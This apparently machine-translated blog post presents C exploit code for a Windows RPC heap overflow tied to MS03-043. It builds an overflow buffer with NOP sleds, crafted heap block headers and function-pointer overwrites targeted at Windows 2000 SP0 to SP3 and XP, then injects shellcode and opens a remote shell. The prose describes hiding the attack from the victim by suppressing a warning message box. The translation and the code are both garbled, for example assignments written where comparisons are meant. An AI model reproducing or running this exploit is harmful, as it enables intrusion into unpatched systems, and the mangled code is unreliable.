DCOM before the removal vulnerability MS03-043 exploitation code

DCOM before the removal vulnerability MS03-043 exploitation code

Because it can go through a dynamic port above udp135 and UDP1024, many machines engaged in APT's daily network firewall and black ice whitelist were also easy to handle. It is the MSG vulnerability that I often say. After realizing the importance of RPC, a series of RPC achievements are made. RPC hot research in China is basically after DCOM is released. It is a pity that some column RPC Library Vulnerabilities exist!

When I come back to find out that the code has been forged for many times, I remember that I did not find the PEB pointer version. The message box will pop up. The solution is to solve the version of the pop-up message box, which won't let people know that there is an attack, but SP confirmation is required to overwrite the function pointer, and 4-byte shellcod jump. This just overwrites a variable, control to prevent message boxes from being played. There are also some length processing problems, which are estimated to be solved by pig.

Void sendoverpack () {int I, j; for (I = 0; I <3; ++ I) {CreateThread (NULL, 0, (LPTHREAD_START_ROUTINE) sendoverstr, 0, 0, & j); Sleep (6000) ;}// sendoverpack (); if (overok = 3) {while (1) Sleep (0x7fffffff) ;}} void sendoverstr () {/** call the remote process */int I, j; RPC_STATUS status; char buff [0x100]; // char buffer [BUFFSIZE]; char * buffer = LocalAlloc (LMEM_ZEROINIT, BUFFSIZE + 2); char * buffer2 = LocalAlloc (LMEM_ZEROINIT, BUFFSIZE + 2); Int funadd = RVAWIN2K + 0x8310; int jmpshelladd = RVAWIN2K + 0x8298; memset (buffer, NOPCODE, SENDBUFFLEN); if (sys_ver_num> 4 | sys_ver_num <0) sys_ver_num = 4; sys_ver_num = 10; if (strcmp (version, "sp0") = 0) sys_ver_num = 0; if (strcmp (version, "sp1") = 0) sys_ver_num = 1; if (strcmp (version, "sp2") = 0) sys_ver_num = 2; if (strcmp (version, "sp3") = 0) sys_ver_num = 3; if (strcmp (version, "winxp") = 0) sys_ver_num = 10; if (sys_ver_num = 10) {funadd = RVAWINXP + 0x8238; jmpshelladd = RVAWINXP + 0x8560;} if (sys_ver_num = 3) {// win2k + sp3 funadd = RVAWIN2K + 0x8078; jmpshelladd = RVAWIN2K + 0x811c;} if (sys_ver_num = 2) {// win2k + sp2 funadd = RVAWIN2K + 0x8330; jmpshelladd = RVAWIN2K + 0x82b8;} if (sys_ver_num = 1) {// win2k + sp1 funadd = RVAWIN2K + 0x8330; jmpshelladd = RVAWIN2K + 0x82b8;} if (sys_ver_num = 0) {// win2k + sp0 funadd = RVAWIN2K + 0x8310; jmpshelladd = R VAWIN2K + 0x8298;} if (sys_ver_num <= 4) {I = 0x0234*8; memcpy (buffer + ADDRESS, "\ x02 \ x01 \ x34 \ x02 \ x01 \ x01 \ x02", 7); // non-idle memory block // memcpy (buffer + ADDRESS + 0x8, "\ x80 \ xf2 \ xfd \ x7f", 4); // fun-4 // memcpy (buffer + ADDRESS + 0x0c, "\ xa8 \ x81 \ xec \ x74 ", 4); // shelladd memcpy (buffer + ADDRESS-I, "\ x30 \ x01 \ x02 \ x01 \ x01 \ x20 \ x02 \ x02", 8 ); // idle memory block * (int *) (buffer + ADDRESS-I + 0x8) = funadd-4; * (int *) (buffer + ADDRESS-I + 0x0c) = jmpshelladd; // Shelladd // memcpy (buffer + ADDRESS-I + 0x8, "\ xa8 \ x81 \ xec \ x74", 4 ); // fun-4 // memcpy (buffer + ADDRESS-I + 0x0c, "\ xd9 \ x8b \ xec \ x74", 4 ); // shelladd j = (0x130 + 0x102-0x234) * 8; memcpy (buffer + ADDRESS + j, "\ x02 \ x01 \ x02 \ x02 \ x01 \ x20 \ x02 \ x02", 8); // idle memory block * (int *) (buffer + ADDRESS + j + 0x8) = 0x0856ff61; * (int *) (buffer + ADDRESS + j + 0x0c) = jmpshelladd; // shelladd // memcpy (buffer + ADDRESS + j + 0x08, "\ x90 \ x90 \ x68 \ xff", 4); // m Emcpy (buffer + ADDRESS + j + 0x0c, "\ xd9 \ x8b \ xec \ x74", 4); I = i-0x10 + j; I = I/2; memset (buffer + ADDRESS + J-2 * I, 0x14, I); strcpy (buffer + ADDRESS + j-I, buffer + ADDRESS + j ); /* I = strlen (buffer + ADDRESS + 0x20)/2; memset (buffer + ADDRESS + 0x20, 0x14, I ); memset (buffer + ADDRESS + 0x20 + strlen (buffer + ADDRESS + 0x20)-I, x 10); j = ADDRESS-j-0x100; I = j/2; memset (buffer + ADDRESS-2 * I, 0x14, I); strcpy (buffer + ADDRESS-I, buffer + ADDRESS); * // * Service Replace 0x14 with 0x0d0x0a. To reduce the overflow String Length, replace the free space with 0x14 */} memset (buffer2, NOPCODE, BUFFSIZE ); I = GetShellcode (buffer2 + 0x10); j = 0x0eeb; for (j = 0x0eeb; j <I; j + = 0x100) {} memset (buffer2 + I, NOPCODE, BUFFSIZE-I); memset (buffer2 + J-1, x 10); I = strlen (buffer2); // memset (buffer + 0x300-1, x 10 ); // len = 0x0ceb 0xeb 0x0c jmp to shellcode // eb 0c 00 00 00 00 00 eb 0c 00 00 t 00 90 90 if (overok = 0) {outprintf ("\ r \ nsend hoo K test packet! \ R \ n "); j = HelloProc (buffer2," testest "," 0 "); // buffer); overok = 1; outprintf ("\ r \ npacket send OK! Return 0x % x \ r \ n ", j); if (j! = OKNUM) j = HelloProc ("t", "testest", buffer); // send over packet if (j = OKNUM) {overok = 3; shellcmd ();} else {overok = 0; j = HelloProc (buffer2, "testest", "1"); // send hook packet} ExitThread (0 ); /* test shows that when RPC uses UDP for communication, if the packet length is too long, the first time the call succeeds, and the second RPC call fails. however, restarting the program can be successfully sent once again. it seems that the client of RPC communication has a problem with UDP communication. */}